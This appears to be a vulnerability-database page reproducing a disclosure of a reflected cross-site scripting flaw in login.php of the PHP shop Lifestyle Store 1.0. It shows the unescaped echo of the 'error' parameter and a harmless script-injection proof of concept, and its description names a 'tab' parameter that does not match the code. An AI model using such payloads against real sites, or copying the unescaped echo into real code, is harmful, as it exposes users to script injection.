Lucene search
K

Lifestyle Store 1.0 Cross Site Scripting

🗓️ 04 Oct 2021 00:00:00Reported by AbdulrahmanType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 263 Views

Lifestyle Store 1.0 XSS vulnerability in login.ph

Code
`# Exploit Title: Lifestyle Store (Online Shop Store) 1.0 - Reflected Cross-Site Scripting (XSS)  
# Date: 2021-09-30  
# Author: Abdulrahman https://twitter.com/infosec_90  
# Software Link: https://download-media.code-projects.org/2021/07/Online_Shop_Store_In_PHP_With_Source_Code.zip  
# Version: 1.0.0  
# Tested on: Kali Linux  
  
  
1. Description:  
The tab parameter in the login.php is vulnerable to XSS.  
  
  
2. login.php in line 43 code:  
  
if(isset($_GET["error"])){  
echo $_GET['error'];  
}  
  
3. Proof of Concept:  
/online-shop/login.php?error=<script>print()</script>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Oct 2021 00:00Current
7.4High risk
Vulners AI Score7.4
263